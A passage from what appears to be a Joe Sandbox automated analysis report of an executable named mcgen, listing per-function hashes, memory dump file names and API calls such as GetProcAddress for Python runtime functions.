                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction ID: 84d3a478d89b2d190fce0a413e4f0ca67f1d0c7232cecda021be7dfd1f122380
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2216F21B1C6C242FAA49F699590379368E9F847B6F094239FB2EC73D5CE7CE4458301
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction ID: e67232def70fa55fa56adabe1b4fad2f336a587335884d8567687d852b7dd81f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5641B23291828187EA34DF6DA54037977A8EB56BA6F100135EB8EC76D1CF3DE502CB51
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1e24cc1f21cbc5d23192e9d74751cede06163928856a51bbdacdb3ed0e8e5f47
                                                                                                                                                                                                                                                                    • Instruction ID: f9b6db9aa867ec675e2f8407fc25848344e02f783b5d28898bd7d3fe0f445e5c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e24cc1f21cbc5d23192e9d74751cede06163928856a51bbdacdb3ed0e8e5f47
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2521F361B086B686FA109F2B66003BAA659BF47BE5F8C4030EF0C87786CE3DE0418640
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction ID: 67fabbbfb9de933cb546baee5dd33cc0a6eaee0df5fd85bead2c642512795a98
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B316F31E2869285E7515F6D884137C3658AB81BB7F514239FF6D833D2CEBCE4418B11
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                    • Instruction ID: f5ca07c8c73167b233278cce2ccd56dde1edcba4a534f77d2f46ff20c9499bc1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C216B36A0478A8AEB248F68C4843EC33B8EB04739F541635E72D87AD6DF38D584CB40
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction ID: 6fa72d510ac2b52eb9e7dabce780b9d496eb64c58645c1271f6cbe49e2895430
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0112E22A2C7C282EB609F59940137EB2ACAF85BA5F554031FB4CD7A96DF7DD5408701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: a16b878d8f9bc7bad4a9867ae9082fb04db46b2abedc329dc4e18f4e0ccbf167
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8216F72A1CA8686DB718F6CD48137976A4EB84BB5F244234EB9DC76D9DF3DD4008B01
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction ID: 7b44969c58d0839089edb9f04bc29d8a04f9cda4c76d102c320c4d10a5f83206
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101C422A0878140EA04DF5A9901679B699BF86FF1F2C8631FF5C97BD6CE3CE1018300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction ID: 0c92e11222cd8b341bd11b7a04fd23c1ead94a1457aa456a407b479753ba12da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5013920A2D2C241FE606F2955013B97198AF447B2F148635FB1CC36EADE3CF4418651
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction ID: 67288f0d8ff22aedbb0f62bdfa883c3cb14c635697f1eb44a51fcbaa86ecd31e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E0ECA4E1968786FA143FAD498237931185F95762F414430FB09972D3DE7CA8495622
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF6B9F2B39A,?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA), ref: 00007FF6B9F2EC5D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction ID: 19ce7a14e54629dc8b9b3f2c9fd7ab1253ea19c66de66bb27eac62e54ef95a07
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F06254B4968781FE595EAD54613B5278E5F84BA2F6C4430EF0DC73D1DD7CE480C211
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF6B9F20D00,?,?,?,00007FF6B9F2236A,?,?,?,?,?,00007FF6B9F23B59), ref: 00007FF6B9F2D6AA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction ID: 082a22ae3916d8b4d485d9f0ac801f95ea3e696107d558da18071657ae0f0a4d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F03A10A0E68685FA646E79592177426984F947BAF084230EB2EC76C2DE7CA4848120
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15830
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15842
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15879
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1588B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158A4
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158B6
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158CF
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158E1
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158FD
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1590F
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1592B
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1593D
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15959
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1596B
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15987
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15999
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F159B5
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F159C7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                    • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                    • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                    • Instruction ID: 64833a748f52ec33650faa21729608440059ea37befe9707632ec92fc8b0c4cf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1122A6A4A0DB1791FA259F7EA86417423A8AF157B7F459035CB2E83360FF3CB1588352
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
